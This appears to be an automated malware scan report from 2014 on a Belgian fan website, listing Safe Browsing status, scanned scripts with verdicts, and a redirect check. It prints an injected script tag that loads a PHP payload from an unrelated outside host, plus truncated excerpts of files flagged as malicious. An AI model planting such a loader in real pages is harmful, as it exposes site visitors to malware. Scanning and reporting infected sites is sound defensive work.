Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fandecatchbelge.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.fandecatchbelge.net/ | 200 OK Content-Length: 47074 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://capitallake.com.au/fzgn6pdb.php?id=25509332"></script> | ||
http://www.fandecatchbelge.net/wpscripts/jsNavBarFuncs.js | 200 OK Content-Length: 24389 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JSON=JSON||{};(function(){function f(n){return n<10?'0' n:n;} if(typeof Date.prototype.toJSON!=='function'){Date.prototype.toJSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear() '-' f(this.getUTCMonth() 1) '-' f(this.getUTCDate()) 'T' f(this.getUTCHours()) ':' f(this.getUTCMinutes()) ':' f(this.getUTCSeconds()) 'Z':null;};String.prototype.toJSON=Number.prototype.toJSON=Boolean.prototype.toJSON=function(key){return this.valueOf();};} var Antivirus reports:
| ||
http://www.fandecatchbelge.net/wpscripts/global_navtree.js | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://www.fandecatchbelge.net/wpscripts/wp_navbar_flash.js | 200 OK Content-Length: 5195 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function wp_navbar_flash(menubarid, navtree, options, styleOptions) { var me = this; me.options = { "m_bNoScript" : false, "m_bStaticScript" : false }; if( options ) { me.options = WpNavBar.mergeOptions( me.options, options );} me.styleOptions = { 'sFlashFile':'' }; if( styleOptions ) { me.styleOptions = WpNavBar.mergeOptions( me.styleOptions, styleOptions ); } me.write = function(s) { if( this.options.m_bNoScri Antivirus reports:
| ||
http://www.fandecatchbelge.net/wpscripts/jspngfix.js | 200 OK Content-Length: 3050 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var supported = !/Gecko/.test(navigator.userAgent) && !/Opera/.test(navigator.userAgent) && /MSIE (5\.5|6)/.test(navigator.userAgent) && navigator.platform == "Win32"; function OnLoadPngFix() { if(!supported) return; if(!event.srcElement) return; var src=event.srcElement.src; if(!src) return; if(!new RegExp(blankSrc).test(src)) { if(/\.png$/.test(src.toLowerCase())) { src = src.replace(/\(/g, "(" ); src = src.replace( Antivirus reports:
| ||
http://www.123compteur.com/counterskinable01.php?votre_id=605084 | 200 OK Content-Length: 2402 Content-Type: text/javascript | clean |
http://www.fandecatchbelge.net/test404page.js | HTTP/1.1 302 Found Connection: close Date: Fri, 12 Dec 2014 21:40:21 GMT Location: http://hostingerrors.isp.belgacom.be/Errors.cgi?url=http://www.fandecatchbelge.net/test404page.js Server: Apache/2.2.15 (Red Hat) Content-Length: 0 Content-Type: application/x-httpd-cgi Expires: Fri, 12 Dec 2014 21:40:21 GMT | clean |
http://hostingerrors.isp.belgacom.be/errors.cgi?url=http://www.fandecatchbelge.net/test404page.js | 404 Not Found Content-Length: 204 Content-Type: text/html | clean |
http://hostingerrors.isp.belgacom.be/test404page.js | 404 Not Found Content-Length: 208 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fandecatchbelge.net
Result:
GET / HTTP/1.1
Host: fandecatchbelge.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: fandecatchbelge.net
Referer: http://www.google.com/search?q=fandecatchbelge.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fandecatchbelge.net
Referer: http://www.google.com/search?q=fandecatchbelge.net
Result:
The result is similar to the first query. There are no suspicious redirects found.